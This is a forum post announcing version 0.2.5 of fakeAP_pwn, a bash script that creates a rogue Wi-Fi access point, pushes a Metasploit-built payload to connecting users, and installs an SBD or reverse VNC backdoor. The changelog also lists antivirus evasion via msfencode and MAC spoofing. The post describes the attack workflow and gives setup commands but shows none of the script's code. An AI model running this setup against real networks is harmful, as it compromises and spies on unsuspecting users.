Results 1 to 10 of 185

Thread: [Script] [Video] FakeAP_pwn (v0.2.1)

Threaded View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010

    Lightbulb [Script][Video] (v0.2.5)

    Watch video on-line:
    Download video:

    ~ V0.3 FINAL IS OUT ~
    [Script] [Video] fakeAP_pwn (v0.3)

    What is this?

    An update to the script, fakeAP_pwn. This is a bash script to automate creating a 'Fake Access Point' and 'pwn' whoever connects to it! The FakeAP is transparent (allowing the target to afterwards surf the inter-webs once they have been exploited!), and the payload is either SBD (Secure BackDoor - similar to netcat!) or VNC (remote desktop).

    How does this work?
    > Creates a fake AP and DHCP server.
    > Runs a web server & creates an exploit with metasploit.
    > Waits for the target to connect, download and run the exploit.
    > Once successfully exploited it grants access to allow the target to surf the inter-webs.
    > Uploads a backdoor; SBD or VNC, via the exploit
    > The attacker has the option to run a few 'sniffing' programs (from the dnsiff suite) to watch what the target does on the FakeAP!

    What do I need?

    > Two interfaces, one for Internet (wired/wireless) and the other for becoming an access point (wireless only - must support monitor mode)
    > A Internet connection (though you could modify it so its non transparent)
    > Airmon-ng, dhcpd3, apache, metasploit, dnsiff suite --- All on BackTrack!
    > The script! fakeAP_pwn-v0.2.5.tar.gz (490.3 KB, SHA1:541d91c19ff32777317385218820233a62f1dc76)

    Whats in the tar.gz?
    > --- Bash script
    > www/index.php --- The page the target is forced to see before they have access to the Internet.
    > www/Linux.jpg, OSX.jpg, Windows.jpg --- OS pictures
    > www/sbd.exe --- SBD Backdoor> www/vnc-g0tmi1k.exe --- VNC Backdoor

    How to use it?1.) Extract the tar.gz file (via tar zxf fakeAP_pwn-v0.2.5.tar.gz).
    2.) Copy the "www" folder to /var/www (cp www/* /var/www/)
    3.) Make sure to "Start Network" and to have an IP address. (via start-network and dhclient [Internet Interface])
    4.) Edit with your "internet" and "wireless" interface. (You can view your interfaces via ifconfig and use kate to edit the file.)
    5.) bash (don't forget to be in the correct folder!)
    6.) Wait for a connection...
    7.) ...Game Over.

    tar zxf fakeAP_pwn-v0.2.5.tar.gz
    cd fakeAP_pwn-v0.2.5
    cd fakeAP_pwn
    cp www/* /var/www


    • This time it should work for everyone, just not me =P
    • The video uses v0.2.1
    • It's worth doing this "manually" (without the script) before using the script, so you have an idea of what's happening, and why. The script is only meant to save time.
    • I'm running BackTrack 4 Final in VM, The target is running Windows 7 Ultimate (fully up-to-date 2010-05-13), with no firewall, no AV and no UAC. Tested with windows XP SP3 Professional as well.
    • The connection is reversed - so the connection comes from the target to the attacker, therefore, as the attacker is the server, it could help out with firewalls...
    • As you can see in the code, one day I plan for this to also "affect" Linux and/or OSX...but its taken me this long to update it - so don't hold your breath!

    Song: Medicin - Summer Drummer
    Video length: 3:20
    Capture length: 8:12

    Blog Post:
    Forum Post:

    > Removed silly typos

    + Added arguments
    + Checks for superuser
    + Checks interfaces/paths/files exists
    + Improved transparent mode (Thanks joker5bb)
    > General code improvements
    > Updated the help message

    + Fakes the MAC address (Thanks joker5bb)
    + Fix “wicd” bug (Thanks joker5bb)
    + Randomizes ports each time
    + Reversed VNC - No need to type in password now
    + Stops and removes existent backdoors
    + Stops services and programs (Thanks joker5bb)
    + Uses “msfencode” - to prevent detection
    + Webpage now has a "favicon"
    > Fix a few minor features - Couple of silly typos (Thanks joker5bb)
    > General code improvements
    > Improved "clean up" code
    > Improved the WiFi interface (Thanks joker5bb)
    > Renamed the backdoor files
    > Renamed the output windows

    + Fix gateway bug
    + Fix DHCP PID Bug
    + Checks for other index files. And acts on it.
    + Checks to make sure user copied www/. Else acts on it.
    + Added more tools to "extra".
    + Added extra settings (Response to all requests & WiFiName)
    > Improved debug info
    > Aligned the output windows
    > General code improvements
    > Improved chances of DHCP working (Might need more work)
    > "Started" work on transparent (Needs more work)
    > "Started" work on allow a custom backdoor (Needs more work)
    - Removed Linux/OSX - was confusing people

    + Remade first release
    > Created Video

    + First public release
    Last edited by g0tmi1k; 03-05-2011 at 02:17 PM.
    Have you...g0tmi1k?

Similar Threads

  1. Replies: 6
    Last Post: 10-08-2010, 11:40 PM
  2. Script help
    By isdigit in forum OLD Newbie Area
    Replies: 2
    Last Post: 08-21-2009, 02:35 AM
  3. Video: Nmap Video Tutorial 2: Port Scan Boogaloo
    By Irongeek in forum OLD Tutorials and Guides
    Replies: 0
    Last Post: 05-30-2008, 08:07 PM
  4. Video: Nmap Video Tutorial 2: Port Scan Boogaloo
    By Irongeek in forum OLD BT1, Whax and Auditor Videos
    Replies: 0
    Last Post: 05-30-2008, 08:07 PM
  5. LZM Script/lzm2dir script
    By unseen in forum OLD Tutorials and Guides
    Replies: 2
    Last Post: 11-29-2007, 02:51 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts